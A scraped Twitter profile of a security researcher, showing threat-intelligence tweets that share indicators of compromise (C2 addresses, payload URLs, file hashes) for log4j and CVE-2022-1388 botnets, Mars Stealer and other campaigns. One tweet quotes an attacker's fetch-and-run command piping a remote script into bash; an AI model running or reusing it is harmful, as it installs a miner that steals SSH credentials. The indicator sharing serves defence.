Toli (@tolisec)'s Twitter Profile
Toli

@tolisec

Security Researcher. My tweets are my own and do not reflect the views of my employer.

ID: 935242497357426695

Joined: 27-11-2017 20:22:42

130 Tweets

937 Followers

730 Following

Toli (@tolisec):

Tsunami botnet update #log4j IoC: ldap 135.148.132.224:1389 hxxp://106.246.224.219/.l/pty3 hxxp://106.246.224.219/.l/pty4 MalwareBazaar : bazaar.abuse.ch/sample/177de2e…

Toli (@tolisec):

#Kinsing botnet exploiting #log4j IoCs: ldap/web: 178[.]20[.]40[.]227 kinsing bin: bazaar.abuse.ch/sample/5d2530b… curl-amd64: 6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3 libsystem .so: c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

R. (@0xrb):

Recent Chinese Threat Actor #Winnti panel C2: ip: 204.15.78.131:3220 (TCP) url: us\.\host.skybad\.\top Actual Payload hosted here : http://160.251.42(.)252/xghk.exe hash: c99397d66e49e2def1b17f57cd0c5fb9 #GoldDragon #ZxShell #threatintel cc: Mikhail Kasimov (;

☩MalwareMustDie (@malwaremustdie):

Will you be interested to join our #shellcode ADVANCED workshop w/#radare2 to study & RE on how recent threats are using shellcode in their actions aim Win/Mac/Linux OS? This vote will decide workshop planning, your answers matter! cc: Joseph paπcake 🌱 🏴󠁥󠁳󠁣󠁴󠁿 radare #MalwareMustDie

R. (@0xrb):

Recently deployed #Mars #Stealer #Malware C2: http://62.204.41.180/5xtELSMXvf.php Hash: 4d0b2e81d023a1704d0fb71cf3e689ec43a813c4041e6d0d5503de2732d18f15 e5e16ce47ed80d3b802a9c36f7ae408493d1e491ce83f72f253832b150aeb4bc

R. (@0xrb):

Currently Active #Mars #Stealer #Malware spread from CloudLite LLC Russia. They are targeting again India, Brazil, Indonesia, Egypt, Vietnam, Pakistan, Philippines, Mexico. C2: hxxp://jsdkct(.)link/47747.php Hash: 95b229600f28adfbe56fc09cd8a8ff88baf261329999f681613e5c951907d451

R. (@0xrb):

Active #Mars #Stealer #Malware spread from CloudLite LLC Russia. Threat Actor keeps changing URLs. C2 Domain: http://jsdkca(.)link/518855.php hash: 6e304b4616eb9daa7da76d3c1894d5e62af10fe6dc3d6b2356518dbb1121d6b9 Seems malware infection in maas in this C2

Eric Capuano - Bsky: @eric.zip (@eric_capuano):

Everybody is familiar with the value of a tool like VirusTotal for malware... Ever wanted a similar tool for analyzing _not_ malware? Check out EchoTrail - solid collection of information & stats about common binaries found on healthy systems. echotrail.io

Germán Fernández (@1zrr4h):

The miners are arriving! 🤖 (CVE-2022-1388) Attacker IP: 85.106.114.175 🇹🇷 Payload: curl 202.28.229.174/ldr.sh|bash Samples: bazaar.abuse.ch/browse/tag/CVE… * Includes exfiltration of SSH credentials

☩MalwareMustDie (@malwaremustdie):

📢 In #FIRSTCTI22, リック w/ LACERT teams will share the implementation of FIRST.org #CTI Curriculum methods into their investigation of targeted #WebSkimming threat as takeaways for #BlueTeam first.org/events/symposi… Register soon, we value your time with good sharing!

The Shadowserver Foundation (@shadowserver):

We are proud to have assisted (along with partners) in the US DoJ & FBI-led disruption of the Moobot malware botnet comprised of SOHO routers utilized by APT 28/Fancy Bear: justice.gov/opa/pr/justice… Data on infections shared in Sinkhole HTTP Events report: shadowserver.org/what-we-do/net…

Fox_threatintel (@banthisguy9349):

#microsoft just released an article related to #NorthKorean #ThreatActors microsoft.com/en-us/security… Seems that these are active IOCs related to the ransomware group: 192.177.51.248 ccwaterfall[.]com cc: Toli Mikhail Kasimov Gi7w0rm mRr3b00t Fate112